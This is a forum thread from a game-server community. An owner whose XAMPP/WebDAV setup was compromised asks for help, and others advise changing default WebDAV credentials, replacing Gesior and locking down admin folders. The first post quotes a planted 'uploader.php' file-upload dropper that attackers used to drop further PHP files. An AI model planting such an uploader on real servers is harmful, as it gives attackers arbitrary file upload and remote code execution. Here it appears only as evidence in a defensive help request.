Hacking problem!

[Manian]

Hi,

I have a critical problem in my server, 2 players that i have identified them already, are getting i dont know how god position, they get the god position and make items, level, etc and then they get player position again (to avoid being discovered), i discovered them because of the logs files of gods,cms,etc... I have been researching what it can be and i have one thing clear... is not the server, is web-based problem

I host my server and in the xampp folder there is another folder named "webdav" (outside htdocs), recently my antivirus (Norton Antivirus with license) detected a trojan in that folder, someone somehow is updating items to the folder, like .php files, the file infected .exe (trojan), etc... im worried because not only my server is in danger, my pc too! :'(, Luckily i have a good antivirus that have been protecting me!

Im using TFS 0.4 rev 3777 (YES, I GOT IT WHEN I WAS MEMBER)
Xampp Control Panel Version 2.5.8
Xamp for Windows Version 1.7.3
Gesior Version 0.3.4beta4

This is 1 file of 3 they uploaded or created somehow in the folder:
uploader.php

<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
Send this file: <INPUT NAME="userfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<?
move_uploaded_file($userfile, "entrika.php"); 
?>

The other 2 i can't copy-paste them because they're to long for the post

Thanks beforehand =* :'(

 

[Maxens]

http://otland.net/f16/no-support-private-svn-forgotten-server-0-4-here-132978/

PWNED.

 

[Manian]

Read again bro, im not asking for TFS support im asking for a web problem support

 

[Sweddy]

Change Xampp to Uniserver

 

[Manian]

I was thinking in doing that, but im so used to use xamp that uniserver looks too complicated

 

[Zakhran]

First, delete webdav and webalizer folders, then you can lock your phpMyAdmin and other roots with htaccess files, and ALSO check that you don't have new users in your pc.. the same happened to me, and i discovered that the hackers was accessing my admin through another user.

 

[Sweddy]

Look on this tutorial on the Uniserver section! VERY Easy! http://otland.net/f479/nothing-full...niform-server-forgotten-server-0-3-6-a-77593/

 

[Mjmackan]

You have to secure your gesioraac, to be honest i am not that good in any stuff related to gesioraac. Ask cykotitan, he is great in securing gesioraac

http://otland.net/f16/no-support-private-svn-forgotten-server-0-4-here-132978/

PWNED.

You can't read english.
PWNED.

 

[Manian]

Uhm... i think im risking alot with xamp and gesior so im going to move to uniform serv and modern acc, thanks anyways guys i love you =******

 

[Bica]

Change Xampp to Uniserver

else use wamp xD

Uhm... i think im risking alot with xamp and gesior so im going to move to uniform serv and modern acc, thanks anyways guys i love you =******

you dont need to change the xampp if you use gesior ... just remove gesior from htdocs and paste with modern acc files, and at config.lua dont forget to change ecryption.."plan" to "sha1"

 

[BeniS]

Gesior Version 0.3.4beta4 < this is your problem, along with XAMPP, you need to secure it all.

 

[GoD Aro]

The problem is that they were getting access through the remote control of xampp (webdav) with the default passwords wampp/xampp... to secure it just change the default password at /xampp/security/webdav.htpasswd

So, the hackers uploaded a .php file that allow them to have access to the apache database and all your pc! ^_^

 

[Dylanaw]

else use wamp xD




you dont need to change the xampp if you use gesior ... just remove gesior from htdocs and paste with modern acc files, and at config.lua dont forget to change ecryption.."plan" to "sha1"

Correction: plain to sha1

(it's no offense, but he might dunno what u mean with "plan")

 

[Raggaer]

Gesior = hacker ftw get Znote or modern .______________.

 

[Dylanaw]

Gesior = hacker ftw get Znote or modern .______________.

True, but he also should get Uniform Server, it's much better than Xamp and much easier too. (Just if u get the hang of it)

- - - Updated - - -

@Manian I can assist u to get UniformServer + ModernACC, I will also explain how things works.
Just tell me if u want to change it and if u want my help.

 

[Raggaer]

You can also fix gesior issues its not so dificcult and use uniform